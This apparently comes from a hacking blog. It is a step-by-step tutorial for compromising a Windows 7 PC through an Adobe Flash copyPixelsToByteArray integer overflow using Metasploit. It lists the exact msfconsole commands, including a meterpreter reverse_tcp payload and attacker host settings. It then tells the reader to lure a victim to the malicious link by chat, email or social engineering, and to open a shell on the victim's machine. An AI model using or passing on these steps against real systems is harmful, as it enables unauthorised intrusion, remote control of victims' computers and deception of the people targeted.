Hack Remote Windows PC using Adobe Flash Player copy Pixels to ByteArray Integer Overflow

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/browser/adobe_flash_copy_pixel_to_byte_array
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set srvhost 192.168.1.16
msf exploit (adobe_flash_copy_pixel_to_byte_array)>set uripath /
msf exploit (adobe_flash_copy_pixel_to_byte_array)>exploit


Now an URL you should give to your victim http://192.168.1.16:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.1.16:8080) a session will be opened as shown below


Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into
Victims command prompt.

0 comments:

Post a Comment